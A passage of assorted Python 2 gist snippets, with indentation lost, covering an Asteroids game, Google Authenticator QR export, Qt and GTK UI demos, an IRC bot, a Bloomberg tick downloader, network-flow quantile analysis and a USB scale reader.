canvas.draw_text("Lives", (40, 40), 18, "White", "sans-serif")
canvas.draw_text(str(lives), (40, 64), 18, "White", "sans-serif")
# draw score
canvas.draw_text("Score", (WIDTH - 80, 40), 18, "White", "sans-serif")
canvas.draw_text(str(score), (WIDTH - 80, 64), 18, "White", "sans-serif")
# draw ship and rocks
my_ship.draw(canvas)
a_rock.draw(canvas)
# update ship and rocks
my_ship.update()
a_rock.update()
# draw and update missiles
for i in missiles:
i.draw(canvas)
i.update()
def key_down(key):
global missiles
if simplegui.KEY_MAP.get("up") == key:
my_ship.set_thrust(True)
elif simplegui.KEY_MAP.get("left") == key:
my_ship.angle_vel = -0.1
elif simplegui.KEY_MAP.get("right") == key:
my_ship.angle_vel = 0.1
elif simplegui.KEY_MAP.get("space") == key:
missiles.append(my_ship.shoot())
def key_up(key):
if simplegui.KEY_MAP.get("up") == key:
my_ship.set_thrust(False)
elif simplegui.KEY_MAP.get("left") == key:
my_ship.angle_vel = 0.0
elif simplegui.KEY_MAP.get("right") == key:
my_ship.angle_vel = 0.0
# timer handler that spawns a rock
def rock_spawner():
pos = [random.random() * WIDTH]
pos.append(random.random() * HEIGHT)
a_rock.pos = pos
a_rock.vel = angle_to_vector(random.random() * 2 * 3.141592) # random vel
a_rock.angle_vel = (random.random() - 0.5) * 0.05 # random spin vel
# initialize frame
frame = simplegui.create_frame("Asteroids", WIDTH, HEIGHT)
# initialize ship and two sprites
my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, 0, ship_image, ship_info,
ship_thrust_sound)
a_rock = Sprite([0, 0], [0, 0], 0, 0, asteroid_image, asteroid_info)
rock_spawner() # force a initial spawn
missiles = list()
# register handlers
frame.set_draw_handler(draw)
frame.set_keydown_handler(key_down)
frame.set_keyup_handler(key_up)
timer = simplegui.create_timer(1000.0, rock_spawner)
# get things rolling
timer.start()
frame.start()
```
#### File: hard-gists/5702d57eb4cb6ef6e7e8/snippet.py
```python
import argparse
import os
import qrcode
import qrcode.image.pil
import sqlite3
import sys
import urllib
class AuthenticatorAccount(object):
def __init__(self, account_name, account_desc, secret):
self.account_name = account_name
self.account_desc = account_desc
self.secret = secret
def __repr__(self):
return "AuthenticatorAccount@%s%s" % (hex(id(self))[2:], self.__dict__)
def __main__():
parser = argparse.ArgumentParser()
parser.add_argument("database", help="The SQLite database file.")
args = parser.parse_args()
if not os.path.isfile(args.database):
sys.stderr.write("Unable to open %s.\n" % (args.database,))
sys.stderr.flush()
sys.exit(1)
conn = sqlite3.connect(args.database)
conn.row_factory = sqlite3.Row
cursor = conn.cursor()
cursor.execute("SELECT * FROM accounts ORDER BY _id;")
row = None
while True:
row = cursor.fetchone()
if row is None:
break
account = AuthenticatorAccount(row['issuer'] or row['original_name'], row['email'],
row['secret'])
print """Saving "%s" to "qrcode-account-%02d.svg" """[:-1] % (account.account_desc,
row['_id'])
qr = qrcode.make("otpauth://totp/%s?secret=%s&issuer=%s" % (account.account_desc,
account.secret, account.account_name), image_factory=qrcode.image.pil.PilImage)
with open("qrcode-account-%02d.png" % (row['_id'],), "wb") as f:
qr.save(f)
if __name__ == "__main__":
__main__()
```
#### File: hard-gists/5703516/snippet.py
```python
from PySide import QtGui, QtCore
def findviewer():
stack = QtGui.QApplication.topLevelWidgets()
viewers = []
while stack:
widget = stack.pop()
if widget.windowTitle().startswith('Viewer'):
# TODO: More robust detection of viewer widget (verify some of the child widgets or something..?)
viewers.append(widget)
stack.extend(c for c in widget.children() if c.isWidgetType())
return viewers
class KeyIntercepter(QtCore.QObject):
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.Type.KeyPress:
if event.key() == QtCore.Qt.Key_C:
def sendkey(key):
new_event = QtGui.QKeyEvent(QtCore.QEvent.KeyPress, key, QtCore.Qt.NoModifier)
QtGui.QApplication.instance().postEvent(
obj,
new_event)
                # Same as pressing "RGRR" in viewer, switches between two channels, then back to RGB
sendkey(QtCore.Qt.Key_R)
sendkey(QtCore.Qt.Key_G)
sendkey(QtCore.Qt.Key_R)
sendkey(QtCore.Qt.Key_R)
# Event was handled..
return True
        return QtCore.QObject.eventFilter(self, obj, event)
viewers = findviewer()
# Remove old event filter
# FIXME: Debugging thing, for iteration in script editor
try: dag.removeEventFilter(thing)
except: pass
# Install event filter
thing=KeyIntercepter()
for v in viewers:
v.installEventFilter(thing)
```
#### File: hard-gists/5748e199a3bec164a867c9b654e5ffe5/snippet.py
```python
import numpy as np
import gym
from gym.spaces import Discrete, Box
from gym.wrappers import Monitor
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten
# ================================================================
# Policies
# ================================================================
class DeterministicDiscreteActionLinearPolicy(object):
def __init__(self, theta, model, ob_space, ac_space):
"""
dim_ob: dimension of observations
n_actions: number of actions
theta: flat vector of parameters
"""
dim_ob = ob_space.shape[0]
n_actions = ac_space.n
#assert len(theta) == (dim_ob + 1) * n_actions
#self.W = theta[0 : dim_ob * n_actions].reshape(dim_ob, n_actions)
#self.b = theta[dim_ob * n_actions : None].reshape(1, n_actions)
self.model = model
self.shapes = [w.shape for w in self.model.get_weights()]
self.sizes = [w.size for w in self.model.get_weights()]
self.model.set_weights(self._get_weights_list(theta))
self.model.compile(optimizer='sgd', loss='mse')
def _get_weights_list(self, weights_flat):
weights = []
pos = 0
for i_layer, size in enumerate(self.sizes):
arr = weights_flat[pos:pos+size].reshape(self.shapes[i_layer])
weights.append(arr)
pos += size
return weights
def act(self, ob):
"""
"""
batch = np.array([[ob]])
actions = self.model.predict_on_batch(batch).flatten()
return np.argmax(actions)
class DeterministicContinuousActionLinearPolicy(object):
def __init__(self, theta, ob_space, ac_space):
"""
dim_ob: dimension of observations
dim_ac: dimension of action vector
theta: flat vector of parameters
"""
self.ac_space = ac_space
dim_ob = ob_space.shape[0]
dim_ac = ac_space.shape[0]
assert len(theta) == (dim_ob + 1) * dim_ac
self.W = theta[0 : dim_ob * dim_ac].reshape(dim_ob, dim_ac)
self.b = theta[dim_ob * dim_ac : None]
def act(self, ob):
a = np.clip(ob.dot(self.W) + self.b, self.ac_space.low, self.ac_space.high)
return a
def do_episode(policy, env, num_steps, discount=1.0, render=False):
disc_total_rew = 0
ob = env.reset()
for t in xrange(num_steps):
a = policy.act(ob)
(ob, reward, done, _info) = env.step(a)
disc_total_rew += reward * discount**t
if render and t%3==0:
env.render()
if done: break
return disc_total_rew
env = None
def noisy_evaluation(theta, discount=0.90):
policy = make_policy(theta)
reward = do_episode(policy, env, num_steps, discount)
return reward
def make_policy(theta):
if isinstance(env.action_space, Discrete):
return DeterministicDiscreteActionLinearPolicy(theta,
model, env.observation_space, env.action_space)
elif isinstance(env.action_space, Box):
return DeterministicContinuousActionLinearPolicy(theta,
env.observation_space, env.action_space)
else:
raise NotImplementedError
# Task settings:
env = gym.make('CartPole-v1') # Change as needed
#env = Monitor(env, '/tmp/cartpole-experiment-1', force=True)
# Alg settings:
num_steps = 500 # maximum length of episode
n_iter = 50 # number of iterations of ES
batch_size = 25 # number of samples per batch
#extra_std = 2.0
#extra_decay_time = 10
# Model
# model = Sequential()
# model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
# model.add(Dense(env.action_space.n))
# model.add(Activation('softmax'))
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(env.action_space.n))
model.add(Activation('softmax'))
sizes = [w.size for w in model.get_weights()]
if isinstance(env.action_space, Discrete):
dim_theta = sum(sizes)
elif isinstance(env.action_space, Box):
dim_theta = (env.observation_space.shape[0]+1) * env.action_space.shape[0]
else:
raise NotImplementedError
# Initialize mean and standard deviation
epsilon_mean = np.zeros(dim_theta)
sigma = 2
epsilon_std = sigma * np.ones(dim_theta)
theta = np.random.uniform(-1, 1, size=dim_theta)
alpha = 0.001
# Now, for the algorithm
for itr in xrange(n_iter):
# Sample parameter vectors and evaluate rewards
#extra_cov = max(1.0 - itr / extra_decay_time, 0) * extra_std**2
epsilons = np.random.multivariate_normal(mean=epsilon_mean,
cov=np.diag(np.array(epsilon_std**2)),
size=batch_size)
rewards = np.array(map(noisy_evaluation, theta + sigma * epsilons))
# standardize the rewards
rewards = (rewards - rewards.mean()) / rewards.std()
# gradient ascent with score function estimator
theta += alpha * rewards.dot(epsilons) / (batch_size * sigma)
print "iteration %i. mean f: %8.3g. max f: %8.3g"%(itr, np.mean(rewards), np.max(rewards))
do_episode(make_policy(theta), env, num_steps, discount=0.90, render=True)
env.close()
```
#### File: hard-gists/574fc95caee4c22f21ed/snippet.py
```python
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
db = SQLAlchemy(app)
class Author(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
books = db.relationship('Book', backref='author')
def __repr__(self):
return '<Author:{}>'.format(self.name)
class Book(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.Text)
content = db.Column(db.Text)
author_id = db.Column(db.Integer, db.ForeignKey('author.id'))
def __repr__(self):
return '<Book:{}>'.format(self.title)
categories = db.Table('categories',
db.Column('category_id', db.Integer, db.ForeignKey('category.id')),
db.Column('book_id', db.Integer, db.ForeignKey('book.id'))
)
class Category(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
books = db.relationship('Book', secondary=categories,
backref=db.backref('categories', lazy='dynamic'))
def __repr__(self):
return '<Category:{}>'.format(self.name)
with app.app_context():
db.create_all()
bob = Author(name='Bob')
dune = Book(title='Dune')
moby_dick = Book(title='Moby Dick')
carol = Author(name='Carol')
ring_world = Book(title='Ring World')
fahrenheit = Book(title='Fahrenheit 451')
bob.books = [dune, moby_dick]
carol.books = [ring_world, fahrenheit]
db.session.add(bob)
db.session.add(carol)
db.session.commit()
author = Author.query.filter_by(name='Bob').first()
    print author # <Author:Bob>
    print author.books # [<Book:Dune>, <Book:Moby Dick>]
dune_book = Book.query.filter_by(title='Dune').first()
print dune_book # <Book:Dune>
print dune_book.author # <Author:Bob>
scifi = Category(name='Science Fiction')
classic = Category(name='Classic')
classic.books = [moby_dick, dune, fahrenheit]
scifi.books = [dune, ring_world]
db.session.add_all([classic, scifi])
db.session.commit()
print dune, dune.categories.all()
print dune.categories.filter(Category.name.ilike('sci%')).all()
alice = Author(name='Alice')
beowulf = Book(title='Beowulf')
beowulf.author = alice
beowulf.categories = [classic]
db.session.add(beowulf)
db.session.commit()
print Author.query.join(Author.books).filter(
Book.categories.contains(scifi)).all()
print Category.query.join(Category.books).filter(
Book.author==carol).all()
```
#### File: hard-gists/5780124/snippet.py
```python
import flac.encoder as encoder
import pyaudio
import sys
import requests
import random
from threading import Thread
from Queue import Queue, Empty
from time import sleep
class google_stt_stream(object):
def __init__(self):
self.write_queue = Queue()
self.keep_streaming = True
self.upstream_url = "https://www.google.com/speech-api/full-duplex/v1/up?key=%(key)s&pair=%(pair)s&lang=en-US&maxAlternatives=20&client=chromium&continuous&interim"
self.upstream_headers = {'content-type': 'audio/x-flac; rate=16000'}
self.downstream_url = "https://www.google.com/speech-api/full-duplex/v1/down?pair=%(pair)s"
self.api_key = "<your_api_key>"
def generate_request_key(self):
return hex(random.getrandbits(64))[2:-1]
def start(self):
pair = self.generate_request_key()
upstream_url = self.upstream_url % {"pair": pair, "key": self.api_key}
downstream_url = self.downstream_url % {"pair": pair, "key": self.api_key}
self.session = requests.Session()
self.upstream_thread = Thread(target=self.upstream, args=(upstream_url,))
self.downstream_thread = Thread(target=self.downstream, args=(downstream_url,))
self.downstream_thread.start()
self.upstream_thread.start()
def stop(self):
print "Waiting write_queue to write all data"
self.write_queue.join()
print "Queue empty"
sleep(10)
self.keep_streaming=False
self.upstream_thread.join()
self.downstream_thread.join()
def write_data(self, data):
self.write_queue.put(data)
def gen_data(self):
while self.keep_streaming:
try:
item = self.write_queue.get(timeout=2)
except Empty:
return
yield item
self.write_queue.task_done()
def upstream(self, url):
print self.session.post(url, headers=self.upstream_headers, data=self.gen_data())
def downstream(self, url):
r = self.session.get(url, stream=True)
while self.keep_streaming:
try:
for line in r.iter_content():
if not self.keep_streaming:
break
if line:
sys.stdout.write(line)
except Exception as e:
print "Exception %s, restarting" %e
self.keep_streaming = False
self.upstream_thread.join()
self.keep_streaming = True
self.start()
return
print "end"
stt = google_stt_stream()
def write(enc, buf, samples, current_frame):
stt.write_data(buf)
#print current_frame, samples
return True
#config
chunk = 512
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
THRESHOLD = 180 # Intensity threshold below which the signal is treated as silence.
#open stream
p = pyaudio.PyAudio()
stream = p.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
frames_per_buffer = chunk)
# setup the encoder ...
enc = encoder.StreamEncoder()
enc.set_channels(1)
#enc.set_bits_per_sample(wav.getsampwidth()*8)
enc.set_sample_rate(16000)
#enc.set_compression_level(0)
# initialize
if enc.init_stream(write) != encoder.FLAC__STREAM_ENCODER_OK:
print "Error"
sys.exit()
# start encoding !
stt.start()
nsamples = 512
while 1:
data = stream.read(nsamples)
if not data:
enc.finish()
break
enc.process(data, nsamples)
#sleep(.001)
stt.stop()
```
#### File: hard-gists/5793291/snippet.py
```python
from PyQt4 import QtCore, QtGui
class ColorBox(QtGui.QFrame):
def __init__(self,parent=None):
super(ColorBox,self).__init__(parent)
self.bgColor = QtCore.Qt.white
self.setFixedHeight(20)
self.setFrameStyle(1)
self.setStyleSheet("QWidget { border-color: rgba(0,0,0,0)}")
def mousePressEvent(self, e):
if e.buttons() == QtCore.Qt.LeftButton:
col = QtGui.QColorDialog.getColor(self.bgColor, self)
if col.isValid():
rgb = (col.red(), col.green(), col.blue())
self.setStyleSheet("QWidget { background-color: rgb(%d,%d,%d) }" % rgb)
self.bgColor = col
if __name__ == "__main__":
app = QtGui.QApplication([])
c = ColorBox()
c.show()
app.exec_()
```
#### File: hard-gists/5794494/snippet.py
```python
from gi.repository import Gtk, Gdk
import sys
class MyWindow(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="Hello World")
self.set_name('MyWindow')
self.set_default_size(600, 300)
self.box = Gtk.HBox()
self.box.set_halign(Gtk.Align.CENTER)
self.box.set_valign(Gtk.Align.CENTER)
self.add(self.box)
self.button1 = Gtk.Button(label="Hello")
self.button1.connect("clicked", self.on_button1_clicked)
self.box.pack_start(self.button1, True, True, 0)
self.button2 = Gtk.Button(label="Goodbye")
self.button2.connect("clicked", self.on_button2_clicked)
self.box.pack_start(self.button2, True, True, 0)
def on_button1_clicked(self, widget):
print("Hello")
def on_button2_clicked(self, widget):
print("Goodbye")
def main(argv):
def gtk_style():
css = b"""
* {
transition-property: color, background-color, border-color, background-image, padding, border-width;
transition-duration: 1s;
font: Cantarell 20px;
}
GtkWindow {
background: linear-gradient(153deg, #151515, #151515 5px, transparent 5px) 0 0,
linear-gradient(333deg, #151515, #151515 5px, transparent 5px) 10px 5px,
linear-gradient(153deg, #222, #222 5px, transparent 5px) 0 5px,
linear-gradient(333deg, #222, #222 5px, transparent 5px) 10px 10px,
linear-gradient(90deg, #1b1b1b, #1b1b1b 10px, transparent 10px),
linear-gradient(#1d1d1d, #1d1d1d 25%, #1a1a1a 25%, #1a1a1a 50%, transparent 50%, transparent 75%, #242424 75%, #242424);
background-color: #131313;
background-size: 20px 20px;
}
.button {
color: black;
background-color: #bbb;
border-style: solid;
border-width: 2px 0 2px 2px;
border-color: #333;
padding: 12px 4px;
}
.button:first-child {
border-radius: 5px 0 0 5px;
}
.button:last-child {
border-radius: 0 5px 5px 0;
border-width: 2px;
}
.button:hover {
padding: 12px 48px;
background-color: #4870bc;
}
.button *:hover {
color: white;
}
.button:hover:active,
.button:active {
background-color: #993401;
}
"""
style_provider = Gtk.CssProvider()
style_provider.load_from_data(css)
Gtk.StyleContext.add_provider_for_screen(
Gdk.Screen.get_default(),
style_provider,
Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
)
gtk_style()
win = MyWindow()
win.connect("delete-event", Gtk.main_quit)
win.show_all()
Gtk.main()
if __name__ == "__main__":
main(sys.argv)
```
#### File: hard-gists/5823693/snippet.py
```python
import sys
from twisted.internet import defer, endpoints, protocol, reactor, task
from twisted.python import log
from twisted.words.protocols import irc
class MyFirstIRCProtocol(irc.IRCClient):
nickname = 'MyFirstIrcBot'
def __init__(self):
self.deferred = defer.Deferred()
def connectionLost(self, reason):
self.deferred.errback(reason)
def signedOn(self):
# This is called once the server has acknowledged that we sent
# both NICK and USER.
for channel in self.factory.channels:
self.join(channel)
# Obviously, called when a PRIVMSG is received.
def privmsg(self, user, channel, message):
nick, _, host = user.partition('!')
message = message.strip()
if not message.startswith('!'): # not a trigger command
return # so do nothing
command, sep, rest = message.lstrip('!').partition(' ')
# Get the function corresponding to the command given.
func = getattr(self, 'command_' + command, None)
# Or, if there was no function, ignore the message.
if func is None:
return
# maybeDeferred will always return a Deferred. It calls func(rest), and
# if that returned a Deferred, return that. Otherwise, return the
# return value of the function wrapped in
# twisted.internet.defer.succeed. If an exception was raised, wrap the
# traceback in twisted.internet.defer.fail and return that.
d = defer.maybeDeferred(func, rest)
# Add callbacks to deal with whatever the command results are.
# If the command gives error, the _show_error callback will turn the
# error into a terse message first:
d.addErrback(self._showError)
# Whatever is returned is sent back as a reply:
if channel == self.nickname:
# When channel == self.nickname, the message was sent to the bot
# directly and not to a channel. So we will answer directly too:
d.addCallback(self._sendMessage, nick)
else:
# Otherwise, send the answer to the channel, and use the nick
# as addressing in the message itself:
d.addCallback(self._sendMessage, channel, nick)
def _sendMessage(self, msg, target, nick=None):
if nick:
msg = '%s, %s' % (nick, msg)
self.msg(target, msg)
def _showError(self, failure):
return failure.getErrorMessage()
def command_ping(self, rest):
return 'Pong.'
def command_saylater(self, rest):
when, sep, msg = rest.partition(' ')
when = int(when)
d = defer.Deferred()
# A small example of how to defer the reply from a command. callLater
# will callback the Deferred with the reply after so many seconds.
reactor.callLater(when, d.callback, msg)
# Returning the Deferred here means that it'll be returned from
# maybeDeferred in privmsg.
return d
class MyFirstIRCFactory(protocol.ReconnectingClientFactory):
protocol = MyFirstIRCProtocol
channels = ['##MyFirstIrcBot']
def main(reactor, description):
endpoint = endpoints.clientFromString(reactor, description)
factory = MyFirstIRCFactory()
d = endpoint.connect(factory)
d.addCallback(lambda protocol: protocol.deferred)
return d
if __name__ == '__main__':
log.startLogging(sys.stderr)
task.react(main, ['tcp:irc.freenode.net:6667'])
```
#### File: hard-gists/5849024/snippet.py
```python
import re, fileinput
import pyPEG
from pyPEG import parse, parseLine
from pyPEG import keyword, _and, _not, ignore
import datetime
## Taken from https://gist.github.com/bertspaan/3059017 and translated to English. It is working well, but if you find any errors, please comment!
numbers = [
"zero",
"one",
"two",
"three",
"four",
"five",
"six",
"seven",
"eight",
"nine",
"ten",
"eleven",
"twelve",
"thirteen",
"fourteen",
"fifteen",
"sixteen",
"seventeen",
"eighteen",
"nineteen"
"twenty",
"twenty one",
"twenty two",
"twenty three",
"twenty four",
"twenty five",
"twenty six",
"twenty seven",
"twenty eight",
"twenty nine",
"thirty",
"thirty one",
"thirty two",
"thirty three",
"four thirty",
"thirty five",
"thirty six",
"thirty seven",
"thirty eight",
"thirty nine",
"forty",
"forty one",
"forty two",
"forty three",
"forty four",
"forty five",
"forty six",
"forty seven",
"forty eight",
"forty nine",
"fifty",
"fifty one",
"fifty two",
"three fifty",
"four fifty",
"fifty five",
"fifty six",
"fifty seven",
"fifty eight",
"fifty nine",
"sixty"
]
times = [
"thirteen past 5",
"12 56",
"12:56",
"twelve thirty",
"nine fifteen",
"quarter to two",
"ten to two",
"three to half ten",
"13 hour 52",
"three thirty",
"seven thirty",
"eighteen fifteen",
"seven",
"nine",
"8 hour",
"eighteen fifteen",
]
def number(): return re.compile(r"\w+")
def half(): return re.compile(r"half")
def hours(): return -1, half, number, -1, keyword("hours")
def sign(): return [re.compile(r"to"), re.compile(r"past")]
def minutes(): return number
def time(): return [
(minutes, sign, hours),
(hours, -1, ":", minutes),
hours
]
def string_to_int(str):
if str == "quarter":
return 15
for i in range(0, 60):
if str == numbers[i]:
return i
return int(str)
def to_time(ast):
minutes_str = ""
hours_str = ""
half = False
sign = 1
# ast is tuple (ast, ''). skip weird '' part:
ast = ast[0]
for symbol in ast:
name = symbol[0]
value = symbol[1]
if name == "hours":
if len(value) == 2:
# Has 'half'
half = True
hours_str = value[1][1]
else:
hours_str = value[0][1]
elif name == "minutes":
minutes_str = value[0][1]
elif name == "sign":
if value[0] == "voor":
sign = -1
minutes = 0
if len(hours_str) > 0:
minutes = string_to_int(hours_str) * 60
if half:
minutes -= 30
if len(minutes_str) > 0:
minutes += sign * string_to_int(minutes_str)
hours = minutes // 60
minutes = minutes - (60 * hours)
today = datetime.date.today() + datetime.timedelta(days=1)
return datetime.datetime.combine(today, datetime.time(hours, minutes))
for time_str in times:
ast = parseLine(textline=time_str, pattern=time(), resultSoFar=[])
print time_str, " => ", to_time(ast)
```
#### File: hard-gists/5856269/snippet.py
```python
import blpapi
import datetime
class BbDownloader:
def __init__(self):
self.output_file = ""
self.TICK_DATA = blpapi.Name("tickData")
self.COND_CODE = blpapi.Name("conditionCodes")
self.TICK_SIZE = blpapi.Name("size")
self.TIME = blpapi.Name("time")
self.TYPE = blpapi.Name("type")
self.VALUE = blpapi.Name("value")
self.RESPONSE_ERROR = blpapi.Name("responseError")
self.CATEGORY = blpapi.Name("category")
self.MESSAGE = blpapi.Name("message")
self.SESSION_TERMINATED = blpapi.Name("SessionTerminated")
def write_tick_data(self, output_filename, security, start_date, end_date):
self.output_file = open(output_filename, "w")
# Fill SessionOptions
sessionOptions = blpapi.SessionOptions()
sessionOptions.setServerHost("localhost")
sessionOptions.setServerPort(8194)
session = blpapi.Session(sessionOptions)
# Start a Session
if not session.start():
print "Failed to start session."
return
try:
# Open service to get historical data from
if not session.openService("//blp/refdata"):
print "Failed to open //blp/refdata"
return
self.sendIntradayTickRequest(session, security, start_date, end_date)
# wait for events from session.
self.eventLoop(session)
finally:
self.output_file.flush()
session.stop()
print "Finished"
def sendIntradayTickRequest(self, session, security, start_date, end_date):
refDataService = session.getService("//blp/refdata")
request = refDataService.createRequest("IntradayTickRequest")
# only one security/eventType per request
request.set("security", security)
# Add fields to request
eventTypes = request.getElement("eventTypes")
for event in ["ASK", "BID", "TRADE"]:
eventTypes.appendValue(event)
# All times are in GMT
request.set("startDateTime", start_date)
request.set("endDateTime", end_date)
request.set("includeConditionCodes", True)
print "Sending Request:", request
session.sendRequest(request)
def eventLoop(self, session):
done = False
while not done:
# nextEvent() method below is called with a timeout to let
# the program catch Ctrl-C between arrivals of new events
event = session.nextEvent(500)
if event.eventType() == blpapi.Event.PARTIAL_RESPONSE:
self.processResponseEvent(event)
elif event.eventType() == blpapi.Event.RESPONSE:
self.processResponseEvent(event)
done = True
else:
for msg in event:
if event.eventType() == blpapi.Event.SESSION_STATUS:
if msg.messageType() == self.SESSION_TERMINATED:
done = True
def processResponseEvent(self, event):
for msg in event:
if msg.hasElement(self.RESPONSE_ERROR):
print msg.getElement(self.RESPONSE_ERROR)
continue
self.processMessage(msg)
def processMessage(self, msg):
data = msg.getElement(self.TICK_DATA).getElement(self.TICK_DATA)
for item in data.values():
time = item.getElementAsDatetime(self.TIME)
timeString = item.getElementAsString(self.TIME)
type = item.getElementAsString(self.TYPE)
value = item.getElementAsFloat(self.VALUE)
size = item.getElementAsInteger(self.TICK_SIZE)
if item.hasElement(self.COND_CODE):
cc = item.getElementAsString(self.COND_CODE)
else:
cc = ""
line = format("%s\t%s\t%.3f\t\t%d\t%s\n" % (timeString, type, value, size, cc))
self.output_file.write(line)
bbdl = BbDownloader()
bbdl.write_tick_data(output_filename="spx.txt",
security="SPX INDEX",
start_date="2013-06-24T00:00:00",
end_date="2013-06-24T23:00:00")
```
#### File: hard-gists/5860853/snippet.py
```python
import sys, traceback, scipy, numpy
from matplotlib import pyplot
from scipy.stats.mstats import mquantiles
def HistogramImage(data):
print 'entered HistogramImage'
#http://www.saltycrane.com/blog/2011/12/creating-histogram-plot-python/
x = [int(dbyte[0]) for dbyte in data]
binsize = 100
totalrangeofhisto = 20000
bins = [i * binsize for i in range(totalrangeofhisto/binsize)]
pyplot.hist(x, bins=bins, facecolor='green', alpha=0.75)
pyplot.xlabel('dbytes')
pyplot.ylabel('Count')
pyplot.suptitle(r'histogram of dbytes')
pyplot.title(r'distribution for matt->smarsh')
pyplot.grid(True)
filename='histo.png'
try:
pyplot.savefig(filename)
print 'saved to %s' %filename
except:
print 'unable to save to %s' %filename
def FindQuantile(data,findme):
print 'entered FindQuantile'
probset=[]
#cheap hack to make a quick list to get quantiles for each permille value]
for i in numpy.linspace(0,1,10000):
probset.append(i)
#http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.mstats.mquantiles.html
quantile_results = mquantiles(data,prob=probset)
#see: http://stackoverflow.com/q/17330252/
quantiles = []
i = 0
for value in quantile_results:
print str(i) + ' permille ' + str(value)
quantiles.append(value)
i = i+1
#goal is to figure out which quantile findme falls in:
i = 0
for quantile in quantiles:
if (findme > quantile):
print str(quantile) + ' is too small for ' + str(findme)
else:
print str(quantile) + ' is the quantile value for the ' + str(i) + '-' + str(i + 1) + ' per mille quantile range. ' + str(findme) + ' falls within this range.'
break
i = i + 1
if __name__ == "__main__":
import MySQLdb
#http://www.tutorialspoint.com/python/python_database_access.htm
#http://www.packtpub.com/article/exception-handling-mysql-python
db = MySQLdb.connect("localhost","argus","db_password","argus" )
cursor = db.cursor()
sql = "SELECT dbytes FROM argus.argusTable_2013_06_24 where (saddr = '192.168.100.23' or daddr = '192.168.100.23') and daddr = '172.16.31.10' and proto = 'tcp' and dport = '443';"
try:
cursor.execute(sql)
results = cursor.fetchall()
lresults = list(results)
except MySQLdb.Error, e:
print "Error: %s" %e
exit()
db.close()
dbytes = []
for row in results:
dbytes.append(int(row[0]))
for dbyte in sorted(dbytes):
print dbyte
try:
dothis = raw_input("What would you like to do? h = histogram, q = quantile ")
if (len(dothis) == 0):
exit()
elif (dothis == 'h'):
print 'calling HistogramImage'
HistogramImage(results)
elif (dothis == 'q'):
andthis = raw_input('What X would you like to find the quantile for? ')
print 'finding Quantile for %s' %andthis
FindQuantile(sorted(lresults), float(andthis))
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback, limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
print "*** format_exc, first and last line:"
formatted_lines = traceback.format_exc().splitlines()
print formatted_lines[0]
print formatted_lines[-1]
print "*** format_exception:"
print repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print "*** extract_tb:"
print repr(traceback.extract_tb(exc_traceback))
print "*** format_tb:"
print repr(traceback.format_tb(exc_traceback))
print "*** tb_lineno:", exc_traceback.tb_lineno
print 'exiting'
exit()
```
#### File: hard-gists/5862530/snippet.py
```python
import os, time
import usb.core
import usb.util
import pygtk
pygtk.require('2.0')
import gtk
from sys import exit
import math
# DYMO M25
VENDOR_ID = 0x0922
PRODUCT_ID = 0x8004
# USPS 75lb scale (doesn't work yet...)
#VENDOR_ID = 0x04d9
#PRODUCT_ID = 0x8010
# find the USB device
dev = usb.core.find(idVendor=VENDOR_ID,
idProduct=PRODUCT_ID)
def main():
try:
# was it found?
if dev is None:
print "device not found"
exit()
else:
devmanufacturer = usb.util.get_string(dev, 256, 1)
devname = usb.util.get_string(dev, 256, 2)
print "device found: " + devmanufacturer + " " + devname
interface = 0
if dev.is_kernel_driver_active(interface) is True:
print "but we need to detach kernel driver"
dev.detach_kernel_driver(interface)
# use the first/default configuration
dev.set_configuration()
print "claiming device"
usb.util.claim_interface(dev, interface)
# XXX would be good to release it when we're done:
#
# print "release claimed interface"
# usb.util.release_interface(dev, interface)
# print "now attaching the kernel driver again"
# dev.attach_kernel_driver(interface)
# print "all done"
listen()
except KeyboardInterrupt as e:
print "\nquitting"
exit();
def grab():
try:
# first endpoint
endpoint = dev[0][(0,0)][0]
# read a data packet
attempts = 10
data = None
while data is None and attempts > 0:
try:
data = dev.read(endpoint.bEndpointAddress,
endpoint.wMaxPacketSize)
except usb.core.USBError as e:
data = None
if e.args == ('Operation timed out',):
attempts -= 1
print "timed out... trying again"
continue
return data
except usb.core.USBError as e:
print "USBError: " + str(e.args)
except IndexError as e:
print "IndexError: " + str(e.args)
def listen():
DATA_MODE_GRAMS = 2
DATA_MODE_OUNCES = 11
last_raw_weight = 0
last_raw_weight_stable = 4
print "listening for weight..."
while True:
time.sleep(.5)
weight = 0
print_weight = ""
data = grab()
if data != None:
raw_weight = data[4] + data[5] * 256
# +/- 2g
if raw_weight > 0 and abs(raw_weight-last_raw_weight) > 0 and raw_weight != last_raw_weight:
last_raw_weight_stable = 4
last_raw_weight = raw_weight
if raw_weight > 0 and last_raw_weight_stable >= 0:
last_raw_weight_stable -= 1
if raw_weight > 0 and last_raw_weight_stable == 0:
if data[2] == DATA_MODE_OUNCES:
ounces = raw_weight * 0.1
weight = math.ceil(ounces)
print_weight = "%s oz" % ounces
elif data[2] == DATA_MODE_GRAMS:
grams = raw_weight
weight = math.ceil(grams)
print_weight = "%s g" % grams
print "stable weight: " + print_weight
clipboard = gtk.clipboard_get()
clipboard.set_text(str(weight))
clipboard.store()
def probe():
for cfg in dev:
print "cfg: " + str(cfg.bConfigurationValue)
print "descriptor: " + str(usb.util.find_descriptor(cfg, find_all=True, bInterfaceNumber=1))
for intf in cfg:
